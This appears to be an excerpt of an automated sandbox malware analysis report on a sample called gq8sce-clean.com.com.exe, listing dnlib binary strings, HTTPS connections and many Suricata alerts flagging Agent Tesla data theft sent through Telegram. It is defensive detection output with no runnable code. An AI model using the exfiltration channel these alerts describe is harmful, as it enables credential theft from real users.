Source: unknown | HTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: gq8sce-clean.com.com.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr

              Networking

              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49707 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49708 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49708 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49707 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49707 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49822 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49707
              Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49822 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49822 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49778 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49778 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49822
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49833 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49833 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49708
              Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49778
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49993 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49992 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49767 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49997 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49996 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49833
              Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.5:49767 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49767 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50003 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50004 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50000 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49997 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49992 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50009 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49996 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.5:49767
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49999 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50012 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50003 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50015 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50014 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50011 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50001 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50000 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50004 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50009 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50012 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49999 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49990 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50015 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50001 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50011 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49990 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50007 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50006 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50013 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50007 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50006 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50008 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50002 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50013 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49993 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50010 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50002 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49994 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50008 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49991 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50010 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49994 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49991 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49998 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50005 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49998 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49995 -> 149.154.167.220:443
